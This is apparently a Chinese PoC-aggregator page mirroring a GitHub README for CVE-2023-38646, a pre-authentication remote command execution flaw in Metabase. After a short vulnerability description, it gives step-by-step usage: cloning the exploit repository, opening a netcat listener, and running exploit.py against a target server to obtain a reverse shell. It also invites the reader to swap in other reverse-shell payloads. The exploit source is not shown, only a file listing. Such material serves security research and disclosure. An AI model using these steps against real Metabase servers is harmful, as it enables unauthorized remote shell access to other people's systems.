关联漏洞
标题:
Metabase 安全漏洞
(CVE-2023-38646)
描述:Metabase是美国Metabase公司的一个开源数据分析平台。 Metabase 0.46.6.1之前版本和Metabase Enterprise 1.46.6.1之前版本存在安全漏洞,该漏洞源于允许攻击者以运行该服务的权限在服务器上执行任意命令。
介绍
# CVE-2023-38646 PoC
## Description
This is a Proof of Concept (PoC) script for exploiting Metabase, an open-source business intelligence and data analytics tool. Metabase allows users to visualize and interact with their data, making it a powerful platform for data analysis.
This vulnerability, designated as CVE-2023-38646, allowed attackers to execute arbitrary commands on the server without requiring any authentication. The impact of this flaw was severe, as it granted unauthorized access to the server at the server's privilege level.
## Proof of Concept (PoC) Steps
<img src="poc.png" alt="" >
**Clone this Repository**
```bash
git clone https://github.com/threatHNTR/CVE-2023-38646.git
```
**Navigate to the Repository**
```bash
cd CVE-2023-38646
```
**Before running the script, set Up a Netcat Listener**
```bash
nc -nlvp chosen-port
```
**Run the Script**
```bash
python3 exploit.py -u http://target-metabase-server -i your-ip-address -p chosen-port
```
**Exploitation**: The script will attempt to send a reverse shell to the target Metabase server. If successful, you will receive a shell on your machine. Feel free to change the payload to try different reverse shells.
## References
- GitHub Advisory: https://github.com/advisories/GHSA-jg32-8h6w-x7vg
- Metabase Advisory: https://www.metabase.com/blog/security-advisory
- Metabase GitHub: https://github.com/metabase/metabase
- Assetnote Blog - Chaining our way to Pre-Auth RCE in Metabase: https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/
文件快照
[4.0K] /data/pocs/046758a92881ebcd05e5080458abecc8ff0ef67e
├── [4.4K] exploit.py
├── [ 85K] poc.png
└── [1.5K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。